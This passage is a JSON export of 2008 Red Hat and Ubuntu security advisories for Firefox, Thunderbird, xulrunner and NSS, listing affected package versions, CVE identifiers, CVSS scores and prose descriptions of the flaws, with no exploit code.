"5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageFilename": "devhelp-0.12-19.el5.i386.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "i386", "packageFilename": "yelp-2.16.0-21.el5.i386.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.2-3.el5", "arch": "i386", "packageFilename": "firefox-3.0.2-3.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.0.2-5.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "src", "packageFilename": "devhelp-0.12-19.el5.src.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.2-3.el5", "arch": "src", "packageFilename": "firefox-3.0.2-3.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "src", "packageFilename": "nss-3.12.1.1-1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "src", "packageFilename": "xulrunner-1.9.0.2-5.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "src", "packageFilename": "yelp-2.16.0-21.el5.src.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "x86_64", "packageFilename": "yelp-2.16.0-21.el5.x86_64.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "x86_64", "packageFilename": "devhelp-0.12-19.el5.x86_64.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-tools-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "x86_64", "packageFilename": "xulrunner-1.9.0.2-5.el5.x86_64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.2-3.el5", "arch": "x86_64", "packageFilename": "firefox-3.0.2-3.el5.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ppc", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.ppc.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ppc64", "packageFilename": "nss-3.12.1.1-1.el5.ppc64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ppc64", "packageFilename": "xulrunner-1.9.0.2-5.el5.ppc64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ppc", "packageFilename": "nss-3.12.1.1-1.el5.ppc.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ppc64", "packageFilename": "nss-devel-3.12.1.1-1.el5.ppc64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "ppc", "packageFilename": "devhelp-0.12-19.el5.ppc.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "ppc", "packageFilename": "yelp-2.16.0-21.el5.ppc.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ppc", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.ppc.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ppc64", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.ppc64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ppc", "packageFilename": "nss-devel-3.12.1.1-1.el5.ppc.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "ppc", "packageFilename": "devhelp-devel-0.12-19.el5.ppc.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ppc", "packageFilename": "nss-tools-3.12.1.1-1.el5.ppc.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ppc", "packageFilename": "xulrunner-1.9.0.2-5.el5.ppc.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ppc64", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.ppc64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ppc", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.el5.ppc.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.2-3.el5", "arch": "ppc", "packageFilename": "firefox-3.0.2-3.el5.ppc.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "s390x", "packageFilename": "yelp-2.16.0-21.el5.s390x.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "s390", "packageFilename": "xulrunner-1.9.0.2-5.el5.s390.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "s390x", "packageFilename": "nss-devel-3.12.1.1-1.el5.s390x.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "s390x", "packageFilename": "xulrunner-1.9.0.2-5.el5.s390x.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "s390", "packageFilename": "devhelp-0.12-19.el5.s390.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "s390", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.s390.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "s390x", "packageFilename": "nss-tools-3.12.1.1-1.el5.s390x.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "s390x", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.el5.s390x.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "s390", "packageFilename": "nss-3.12.1.1-1.el5.s390.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "s390x", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.s390x.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "s390x", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.s390x.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "s390x", "packageFilename": "devhelp-devel-0.12-19.el5.s390x.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "s390", "packageFilename": "nss-devel-3.12.1.1-1.el5.s390.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "s390", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.s390.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.2-3.el5", "arch": "s390", "packageFilename": "firefox-3.0.2-3.el5.s390.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "s390", "packageFilename": "devhelp-devel-0.12-19.el5.s390.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "s390x", "packageFilename": "nss-3.12.1.1-1.el5.s390x.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "s390x", "packageFilename": "devhelp-0.12-19.el5.s390x.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.2-3.el5", "arch": "s390x", "packageFilename": "firefox-3.0.2-3.el5.s390x.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageFilename": "devhelp-devel-0.12-19.el5.i386.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "i386", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.el5.i386.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "ia64", "packageFilename": "devhelp-devel-0.12-19.el5.ia64.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.2-3.el5", "arch": "ia64", "packageFilename": "firefox-3.0.2-3.el5.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ia64", "packageFilename": "nss-devel-3.12.1.1-1.el5.ia64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ia64", "packageFilename": "xulrunner-1.9.0.2-5.el5.ia64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "ia64", "packageFilename": "devhelp-0.12-19.el5.ia64.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ia64", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.ia64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ia64", "packageFilename": "nss-3.12.1.1-1.el5.ia64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "ia64", "packageFilename": "nss-tools-3.12.1.1-1.el5.ia64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ia64", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.el5.ia64.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "ia64", "packageFilename": "yelp-2.16.0-21.el5.ia64.rpm", "packageName": "yelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "ia64", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.ia64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "x86_64", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.x86_64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "x86_64", "packageFilename": "devhelp-devel-0.12-19.el5.x86_64.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "x86_64", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.el5.x86_64.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "x86_64", "packageFilename": "nss-devel-3.12.1.1-1.el5.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}], "description": "Mozilla Firefox is an open source Web browser.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code as the user running Firefox.\n(CVE-2008-4058, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062,\nCVE-2008-4063, CVE-2008-4064)\n\nSeveral flaws were found in the way malformed web content was displayed. A\nweb page containing specially crafted content could potentially trick a\nFirefox user into surrendering sensitive information. (CVE-2008-4067,\nCVE-2008-4068)\n\nA flaw was found in the way Firefox handles mouse click events. A web page\ncontaining specially crafted JavaScript code could move the content window\nwhile a mouse-button was pressed, causing any item under the pointer to be\ndragged. This could, potentially, cause the user to perform an unsafe\ndrag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in Firefox that caused certain characters to be stripped\nfrom JavaScript code. This flaw could allow malicious JavaScript to bypass\nor evade script filters. (CVE-2008-4065)\n\nFor technical details regarding these flaws, please see the Mozilla\nsecurity advisories for Firefox 3.0.2. You can find a link to the Mozilla\nadvisories in the References section.\n\nAll firefox users should upgrade to this updated package, which contains\nbackported patches that correct these issues.\n", "reporter": "RedHat", "published": "2008-09-23T04:00:00", "type": "redhat", "title": "(RHSA-2008:0879) Critical: firefox security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3837", "CVE-2008-4058", "CVE-2008-4060", "CVE-2008-4061", "CVE-2008-4062", "CVE-2008-4063", "CVE-2008-4064", "CVE-2008-4065", "CVE-2008-4067", "CVE-2008-4068"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:12", "id": "RHSA-2008:0879", "href": "https://access.redhat.com/errata/RHSA-2008:0879", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:48", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4065", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4067", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4068", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4061", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4060", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4066", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4070", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4058", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3835", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4063", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4062", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4064", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4059"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "7.04", "packageVersion": "1.5.0.13+1.5.0.15~prepatch080614g-0ubuntu0.7.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mozilla-thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "1.5.0.13+1.5.0.15~prepatch080614g-0ubuntu0.6.06.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mozilla-thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.0.0.17+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.10", "packageVersion": "2.0.0.17+nobinonly-0ubuntu0.7.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}], "description": "It was discovered that the same-origin check in Thunderbird could be bypassed. If a user had JavaScript enabled and were tricked into opening a malicious website, an attacker may be able to execute JavaScript in the context of a different website. (CVE-2008-3835)\n\nSeveral problems were discovered in the browser engine of Thunderbird. If a user had JavaScript enabled, this could allow an attacker to execute code with chrome privileges. (CVE-2008-4058, CVE-2008-4059, CVE-2008-4060)\n\nDrew Yao, David Maciejak and other Mozilla developers found several problems in the browser engine of Thunderbird. If a user had JavaScript enabled and were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064)\n\nDave Reed discovered a flaw in the JavaScript parsing code when processing certain BOM characters. An attacker could exploit this to bypass script filters and perform cross-site scripting attacks if a user had JavaScript enabled. (CVE-2008-4065)\n\nGareth Heyes discovered a flaw in the HTML parser of Thunderbird. If a user had JavaScript enabled and were tricked into opening a malicious web page, an attacker could bypass script filtering and perform cross-site scripting attacks. (CVE-2008-4066)\n\nBoris Zbarsky and Georgi Guninski independently discovered flaws in the resource: protocol. An attacker could exploit this to perform directory traversal, read information about the system, and prompt the user to save information in a file. (CVE-2008-4067, CVE-2008-4068)\n\nGeorgi Guninski discovered that Thunderbird improperly handled cancelled newsgroup messages. If a user opened a crafted newsgroup message, an attacker could cause a buffer overrun and potentially execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4070)", "edition": 3, "reporter": "Ubuntu", "published": "2008-09-26T00:00:00", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4063", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4059", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-26T00:00:00", "id": "USN-647-1", "href": "https://usn.ubuntu.com/647-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:13", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2008-0016", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4065", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4067", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4068", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4061", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4060", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3837", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3836", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4066", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4058", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3835", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4063", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4062", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4069", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4064", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4059"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "7.04", "packageVersion": "2.0.0.17+0nobinonly-0ubuntu0.7.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "3.0.2+build6+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.10", "packageVersion": "2.0.0.17+1nobinonly-0ubuntu0.7.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1.9.0.2+build6+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9", "operator": "lt"}], "description": "Justin Schuh, Tom Cross and Peter Williams discovered errors in the Firefox URL parsing routines. If a user were tricked into opening a crafted hyperlink, an attacker could overflow a stack buffer and execute arbitrary code. (CVE-2008-0016)\n\nIt was discovered that the same-origin check in Firefox could be bypassed. If a user were tricked into opening a malicious website, an attacker may be able to execute JavaScript in the context of a different website. (CVE-2008-3835)\n\nSeveral problems were discovered in the JavaScript engine. This could allow an attacker to execute scripts from page content with chrome privileges. (CVE-2008-3836)\n\nPaul Nickerson discovered Firefox did not properly process mouse click events. If a user were tricked into opening a malicious web page, an attacker could move the content window, which could potentially be used to force a user to perform unintended drag and drop operations. (CVE-2008-3837)\n\nSeveral problems were discovered in the browser engine. This could allow an attacker to execute code with chrome privileges. (CVE-2008-4058, CVE-2008-4059, CVE-2008-4060)\n\nDrew Yao, David Maciejak and other Mozilla developers found several problems in the browser engine of Firefox. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064)\n\nDave Reed discovered a flaw in the JavaScript parsing code when processing certain BOM characters. An attacker could exploit this to bypass script filters and perform cross-site scripting attacks. (CVE-2008-4065)\n\nGareth Heyes discovered a flaw in the HTML parser of Firefox. If a user were tricked into opening a malicious web page, an attacker could bypass script filtering and perform cross-site scripting attacks. (CVE-2008-4066)\n\nBoris Zbarsky and Georgi Guninski independently discovered flaws in the resource: protocol. An attacker could exploit this to perform directory traversal, read information about the system, and prompt the user to save information in a file. (CVE-2008-4067, CVE-2008-4068)\n\nBilly Hoffman discovered a problem in the XBM decoder. If a user were tricked into opening a malicious web page or XBM file, an attacker may be able to cause a denial of service via application crash. (CVE-2008-4069)", "edition": 3, "reporter": "Ubuntu", "published": "2008-09-24T00:00:00", "title": "Firefox and xulrunner vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4063", "CVE-2008-4067", "CVE-2008-3836", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-24T00:00:00", "id": "USN-645-1", "href": "https://usn.ubuntu.com/645-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:41", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2008-0016", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4065", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4067", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4068", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4061", "https://usn.ubuntu.com/usn/usn-645-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4060", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3837", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3836", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4066", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4058", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3835", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4063", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4062", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4069", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4064", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4059"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}], "description": "USN-645-1 fixed vulnerabilities in Firefox and xulrunner for Ubuntu 7.04, 7.10 and 8.04 LTS. This provides the corresponding update for Ubuntu 6.06 LTS.\n\nOriginal advisory details:\n\nJustin Schuh, Tom Cross and Peter Williams discovered errors in the Firefox URL parsing routines. If a user were tricked into opening a crafted hyperlink, an attacker could overflow a stack buffer and execute arbitrary code. (CVE-2008-0016)\n\nIt was discovered that the same-origin check in Firefox could be bypassed. If a user were tricked into opening a malicious website, an attacker may be able to execute JavaScript in the context of a different website. (CVE-2008-3835)\n\nSeveral problems were discovered in the JavaScript engine. This could allow an attacker to execute scripts from page content with chrome privileges. (CVE-2008-3836)\n\nPaul Nickerson discovered Firefox did not properly process mouse click events. If a user were tricked into opening a malicious web page, an attacker could move the content window, which could potentially be used to force a user to perform unintended drag and drop operations. (CVE-2008-3837)\n\nSeveral problems were discovered in the browser engine. This could allow an attacker to execute code with chrome privileges. (CVE-2008-4058, CVE-2008-4059, CVE-2008-4060)\n\nDrew Yao, David Maciejak and other Mozilla developers found several problems in the browser engine of Firefox. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064)\n\nDave Reed discovered a flaw in the JavaScript parsing code when processing certain BOM characters. An attacker could exploit this to bypass script filters and perform cross-site scripting attacks. (CVE-2008-4065)\n\nGareth Heyes discovered a flaw in the HTML parser of Firefox. If a user were tricked into opening a malicious web page, an attacker could bypass script filtering and perform cross-site scripting attacks. (CVE-2008-4066)\n\nBoris Zbarsky and Georgi Guninski independently discovered flaws in the resource: protocol. An attacker could exploit this to perform directory traversal, read information about the system, and prompt the user to save information in a file. (CVE-2008-4067, CVE-2008-4068)\n\nBilly Hoffman discovered a problem in the XBM decoder. If a user were tricked into opening a malicious web page or XBM file, an attacker may be able to cause a denial of service via application crash. (CVE-2008-4069)", "edition": 3, "reporter": "Ubuntu", "published": "2008-09-24T00:00:00", "title": "Firefox vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4063", "CVE-2008-4067", "CVE-2008-3836", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-24T00:00:00", "id": "USN-645-2", "href": "https://usn.ubuntu.com/645-2/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:21", "references": 